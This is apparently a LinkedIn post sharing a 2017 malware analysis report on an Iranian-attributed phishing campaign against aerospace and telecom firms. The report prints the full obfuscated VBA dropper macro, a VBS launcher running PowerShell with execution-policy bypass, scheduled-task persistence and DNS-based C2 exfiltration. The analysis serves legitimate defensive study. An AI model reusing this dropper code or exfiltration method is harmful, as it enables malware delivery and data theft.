Good Morning,
Regard to the news about Iranian Hacking Group Discovered Targeting Aerospace and Telecom.
I would like to share Malware analysis report, I created in 2017, about Iranian malware Targeting Aerospace and Telecom.
#malware #hacking #aerospace #telecom #pentest #redteam
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Iranian Non-malware Fileless Attacks targeting aerospace and telecom
1. Page 1 of 15
This is an Internal Document and should not be shared with unauthorized users.
Iranian Malware analysis report
Iranian malware Targeting Aerospace and Telecom in 2017
Author: Ahmed El-fanagely
Linkedin: https://www.linkedin.com/in/ahmed-pentest/
VERSION 1.0
4. ANNUAL REPORT | 2018 4
2 EXECUTIVE SUMMARY
In this attack, spear phishing was used as the initial infection vector. Before launching the attack,
the group studied publicly available information about the targeted organization and identified
email addresses belonging to various departments of the company.
Email addresses in this department received phishing emails with a malicious Xlsx file.
The phishing emails claimed to have urgent HR survey. The phishing emails were carefully crafted
and written on behalf of a human resources department.
Once the attacker compromise one of employee’s email credential, the attacker starts sending
phishing emails to everyone in same department with a malicious xlsx file.
The phishing emails claimed to have urgent payment to check xlsx file. The phishing emails were
carefully crafted and written on behalf of a victim employee.
The attachments received by email were IOC as shown below:
File name File format MD5 Hash value
TNA.March17.001.xls XLS 2a462cdbaee3b0340bc6298057d83240
3 TOOLSET
• Notepad++
• SSView
• Olevba
4 MITRE ATT&CK
ID Name
T1566,001 Phishing: Spearphishing Attachment
T1204,002 User Execution: Malicious File
T1546,013 Event Triggered Execution: PowerShell Profile
T1053,005 Scheduled Task/Job: Scheduled Task
T1059,005 Command and Scripting Interpreter: Visual Basic
T1071,004 Application Layer Protocol: DNS
5. ANNUAL REPORT | 2018 5
VBA MACRO ANALYSIS
In the event a victim opens the malicious Microsoft Excel spreadsheet attached within the
email, This Excel file contains a single spreadsheet, and the spreadsheet contains invoice data.
As soon as user click on "Enable content" allowing execution of the first stage of the malware
payload.
Figure 1 Malicious Excel spreadsheet
Let us use the popular oledump and olevba Python scripts, to examine whether the XLS file
contains any VBA macros:
6. ANNUAL REPORT | 2018 6
Let us use the popular olevba Python scripts, to examine whether the XLS file contains any VBA
macros:
Figure 2 Malicious Excel spreadsheet
According to olevba tool, the Excel sheet contain VBA macros. VBA code: Observed the below
function that refers to data in the cells.
Private Sub Workbook_Open()
Call F5615664
End Sub
Sub F5615664()
On Error Resume Next
A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell"
I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject"
Set U5777083 = CreateObject(A4660720)
Set D6945409 = CreateObject(I6611623)
W2151843 = U5777083.ExpandEnvironmentStrings("%temp%U1848931.TMP")
I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27)
Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True)
M9383463.WriteLine (I2622608)
M9383463.Close
U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc "
V1380609 = K7517347 & U1808667
U5777083.Run V1380609, 0
ActiveWorkbook.Worksheets(2).Visible = True
ActiveWorkbook.Worksheets(3).Visible = True
ActiveWorkbook.Worksheets(2).Activate
ActiveWorkbook.Worksheets(1).Visible = False
ActiveWorkbook.Save
End Sub
7. ANNUAL REPORT | 2018 7
We did not observe any data initially. we pull the extracted Workbook stream into our hex editor
Using Windows GUI tool for Structure Storage View SSView.
Figure 3 SSView
We pull the extracted Workbook stream into our hex editor and reviewed further and observed
that there was some obfuscated data, and it was encoded as base64 encode (obfuscation
technique) not visible intially.
Figure 3 encode base64
8. ANNUAL REPORT | 2018 8
Find below the De-obfuscated data: (PowerShell script malware)
Now decided to debug the Sub function F5615664 using Visual Basic Editor as it was used in the
call. We able to get the de-obfuscated data from first two parameters in code
A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell"
I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject"
Result:
A4660720 = wScript.Shell
I6611623 = "Scripting.FileSystemObject"
Observed the below function that refers to data in the cells.
W2151843 = U5777083.ExpandEnvironmentStrings("%temp%U1848931.TMP")
I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27)
Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True)
M9383463.WriteLine (I2622608)
M9383463.Close
We found hidden data in these cells as we shown in Figure 3. This data is encoded in base64 and
the VBA macro will drop this data info file in “%temp%U1848931.TMP” as shown in below
code:
W2151843 = U5777083.ExpandEnvironmentStrings("%temp%U1848931.TMP")
I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27)
Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True)
M9383463.WriteLine (I2622608)
M9383463.Close
Then next function will call some data from cells then execute this code
U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc "
V1380609 = K7517347 & U1808667
9. ANNUAL REPORT | 2018 9
U5777083.Run V1380609, 0
the de-obfuscated result:
U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
K7517347 = "cmd.exe -exec bypass -Enc "
V1380609 = K7517347 & U1808667
U5777083.Run V1380609, 0
I am using simple function to dump missing data from hidden cells in below:
Sub Print_p1_file()
Dim strFile_Path As String
strFile_Path = "C:UsersUserDesktop p1.txt"
Open strFile_Path For Output As #1
I2622638 = ActiveWorkbook.Worksheets(1).Cells(37, 27)
Write #1, I2622638
Close #1
End Sub
Sub Print_p2_file()
Dim strFile_Path As String
strFile_Path = "C:UsersUserDesktop p2.txt"
Open strFile_Path For Output As #1
U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
Write #1, U1808667
Close #1
End Sub
Result:
Result:
Now let us decode the code and start Malware Analysis.
10. ANNUAL REPORT | 2018 10
5 POWERSHELL MALWARE DEEP DIVE
the malicious document creates a PowerShell and VBS file and then continues executing the
payload by using the following command line
parameters.
• Malware before profile id path: C:UsersUserAppDataLocalTempU1848931.TMP
• malware path: C:UsersUserAppDataLocalMicrosoftWindowsmc.ps1
• VBS path: C:UsersUserAppDataLocalMicrosoftWindowsL69742.vbs
• Command Line; please note that the string executes through vbs script:
powershell.exe -NoP -sta -NonI -exec bypass -file
C:UsersUserappdatalocalmicrosoftWindowsmc.ps1
Figure 4: Infection procedure
As soon as the macro executes and launches PowerShell, the malware is dropped and proceeds
to a multistage deployment procedure.
1 - PowerShell loader: Create machine id and decode malware file
2: VBS script: Execute malware
3: MC PowerShell malware offers functionality to control infected victims.
11. ANNUAL REPORT | 2018 11
Let us start analysis PowerShell loader, as we see in below first function responsibility to create a
VBS script
VBS data after decoding:
set wss = CreateObject("WScript.Shell")
str = "power" & "sh" & "ell" & ".e" & "xe -NoP -sta -NonI -e" & "xe" & "c byp" & "as" & "s -fi" &
"le "
path = "#dpath#"
str = str + path + "mc.ps1"
wss.Run str, 0
Second function, decoding malware code and create machine Id and replaced in the second-
stage “ mc.ps1”
12. ANNUAL REPORT | 2018 12
last function, Responsible for creating scheduled task named “GoogleServiceUpdate” to execute
VBS script named “L69742.vbs” every 2 minutes.
Let us start analysis PowerShell Malware, MC.ps1 PowerShell malware offers functionality to
control infected victims.
1: Create PATH and Folders
2: Reads the HDD data
3: Download and implant additional tools and malware through DNS requests
4: DNS Data exfiltration
As we see in below image, The first multiple lines are parameters values, include (script path,
download folder, upload folder, machine id, max host length, C2 server)
As below image the function is responsible to terminate the PowerShell if the number of
execution orders exceeds 4
13. ANNUAL REPORT | 2018 13
The below function "base32data", which i highlighted are responsible for encoded and decoded
before and after communicating with the C2.
Now, the below function responsible to create folders “dn” folder and “up” folder.
The below function responsible for communicating with the C2 and download file through DNS
request using windows “NSLookup.exe” file.
14. ANNUAL REPORT | 2018 14
let's go deep dive with this function, in first step the DNS request will start with “script will
replace “ ([string]$id)” to machine id “40699” then add data Randomly to the DNS request then
send the request to C2.
If the C2 response back with OK, then the script will continue with the batch file download
function. But C2 response back with NO, then the script will continue to the upload file function.
as shown in the image below.
The C2 will continue to send and receive data through DNS request until the request contains
"EOFEOF" which mean the File completed.